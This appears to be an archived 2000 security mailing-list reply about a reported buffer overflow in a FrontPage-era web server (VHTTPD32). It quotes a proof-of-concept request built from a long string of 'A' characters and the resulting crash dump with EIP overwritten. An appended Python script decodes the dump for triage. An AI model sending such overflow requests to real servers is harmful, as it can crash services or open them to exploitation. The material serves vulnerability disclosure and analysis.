That's hardly an overflow in FP. VHTTPD32 does not seem to be part of
Windows NT, and still less of FrontPage (could be some old version, of
course). What operating system are you using?

This seems to be an overflow in HTTP (Web Server, PWS or IIS), and for
Windows NT it was handled a long time ago in some postfix and service packs.

It would be a good idea to include complete information about the system you
are testing; otherwise it is useless.

Daniel

> -----Original Message-----
> From: Roman [mailto:[EMAIL PROTECTED]]
> Sent: Saturday, April 22, 2000 10:16 PM
> To: [EMAIL PROTECTED]
> Subject: Re: More vulnerabilities in FP
>
>
> Hello,
>
> > First remote FrontPage exploit?
>
> How about this one:
> http://server/AAAAAAAAAAAA<a lots of A>AAAAAA
>
> FP will overflow and someone will see this message:
>
> VHTTPD32 caused an invalid page fault in
> module <unknown> at 0000:41414141.
> Registers:
> EAX=00000000 CS=0167 EIP=41414141 EFLGS=00010212
> EBX=00000000 SS=016f ESP=00fe53cc EBP=41414141
> ECX=00fe52c4 DS=016f ESI=00fe7744 FS=3647
> EDX=bffc9490 ES=016f EDI=bff94645 GS=0000
> Bytes at CS:EIP:
>
> Stack dump:
> 41414141 41414141 66204141 656c6961 6f662064 32312072
> 2e302e37 2c312e30 61657220 3a6e6f73 6c696620 6f642065
> 6e207365 6520746f 74736978 00000000
>
> Tested on FP 3.0.2.926. Maybe others?
>
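
Added example, not part of either message above: a triage sketch that parses the quoted fault text, reports which registers hold one printable byte repeated four times, and converts the stack dump dwords back to memory order so the text sitting on the stack can be read. It assumes the dump prints little-endian x86 dwords; the function names are illustrative.

```python
import re
import struct

# Fault text copied from the quoted message above.
FAULT = """\
VHTTPD32 caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
EAX=00000000 CS=0167 EIP=41414141 EFLGS=00010212
EBX=00000000 SS=016f ESP=00fe53cc EBP=41414141
ECX=00fe52c4 DS=016f ESI=00fe7744 FS=3647
EDX=bffc9490 ES=016f EDI=bff94645 GS=0000
Bytes at CS:EIP:

Stack dump:
41414141 41414141 66204141 656c6961 6f662064 32312072
2e302e37 2c312e30 61657220 3a6e6f73 6c696620 6f642065
6e207365 6520746f 74736978 00000000
"""

def parse_registers(text):
    """Return {name: int} for every NAME=hex pair in the fault text."""
    return {n: int(v, 16) for n, v in re.findall(r"\b([A-Z]{2,5})=([0-9a-fA-F]+)", text)}

def filler_registers(regs, names=("EIP", "EBP", "ESP")):
    """Registers whose 32-bit value is one printable ASCII byte repeated four times."""
    hits = {}
    for name in names:
        raw = struct.pack("<I", regs[name])
        if len(set(raw)) == 1 and 0x20 <= raw[0] < 0x7F:
            hits[name] = raw.decode("ascii")
    return hits

def stack_bytes(text):
    """Convert the dwords after 'Stack dump:' back to memory order (little-endian x86)."""
    dump = text.split("Stack dump:", 1)[1]
    words = re.findall(r"\b[0-9a-fA-F]{8}\b", dump)
    return b"".join(struct.pack("<I", int(w, 16)) for w in words)

def stack_text(text):
    """Printable rendering of the stack bytes up to the first NUL."""
    data = stack_bytes(text).split(b"\x00", 1)[0]
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data)

if __name__ == "__main__":
    print(filler_registers(parse_registers(FAULT)))
    print(stack_text(FAULT))
```

On the dump above, EIP and EBP both come back as `AAAA`, and the stack reads as ten `A` bytes followed by a log-style error string mentioning 127.0.0.1.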
